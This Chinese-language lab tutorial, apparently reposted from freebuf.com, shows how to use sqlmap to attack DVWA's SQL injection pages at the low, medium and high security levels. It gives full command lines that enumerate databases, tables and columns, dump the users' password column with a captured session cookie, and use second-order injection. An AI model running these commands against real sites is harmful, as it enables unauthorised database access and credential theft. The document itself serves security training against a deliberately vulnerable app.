使用sqlmap对dvwa进行自动化注入
设置dvwa级别为low
- 打开dvwa的SQL Injection(SQL Injection (Blind)),打开浏览器调试,输入user id并submit,查看拦截到的请求。
- 可以看到是一条GET请求,url“http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
- 我们直接放到salmap测试一下,使用-u命令 -u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#“
- 可以看到这里是需要登录的,否则跑不出来。所以我们需要添加一个cookie维持登录
6.使用burp suite代理抓包,获取登录的cookie,添加–dbs 爆数据 -u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” — cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” –dbs
可以看到爆出来的数据库是mysql
7. 我们用-D xxx指定查看的数据库,用–tables查看该数据库的所有表:-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa –tables
查看跑出来的结果:
8.我们用-D xxx -T ttt指定查看的表,用–columns查看表的列
-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa -T users –columns
9.我们用-D xxx查看数据库, -T xxx指定查看的表,用-C xxx查看表的列,用-dump查看列的数据
-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa -T users -C password,user –dump
- 将dvwa安全等级调为medium将抓取的数据包保存为.txt文件,放到sqlmap的目录下,直接-r 文件名 –dbs(后续的参数自己添加即可)
- 将dvwa 安全等级调为high。由于这次的提交页面跟返回结果的页面不是同一个页面,所以之前的那种方法在这里不能用了。要使用二阶注入的方法
- 提交数据的网址
- 返回的网址
将抓取的数据包保存为.txt文件,放到sqlmap的目录下,爆数据库,命令: -r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” — batch –level 2 –dbs
爆表名
-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” – -batch –level 2 -D dvwa –tables
爆列名
-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/”
— batch –level 2 -D dvwa -T user –columns
爆字段数据
-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” — batch –level 2 -D dvwa -T users -C user,password –dump
- 一些概念问题:
- 二阶注入:二阶sql注入–second-order有些时候注入点输入的数据看返回结果的时候并不是 当前的页面,而是另外的一个页面, 这时候就需要你指定到哪个页面获取响应判断真假。–second-url 后面跟一个返回的页面的URL地址
- –batch:自动默认配置,不用手动按yes or no
- level :Sqlmap一共有5个探测等级,默认是1。等级越高,说明探测时使用的payload也越多。其中5级的payload最多,会自动破解出cookie、XFF等头部注入。当然,等级越高,探测的时间也越慢。这个参数会影响测试的注入点,GET和POST的数据都会进行测试,HTTP cookie在level为2时就会测试,HTTP User-Agent/Referer头在level为3时就会测试。在不确定哪个参数为注入点时,为了保证准确性,建议设置level为5(速度也随之变慢)
来源:freebuf.com 2019-11-05 14:47:13 by: clq1997
请登录后发表评论
注册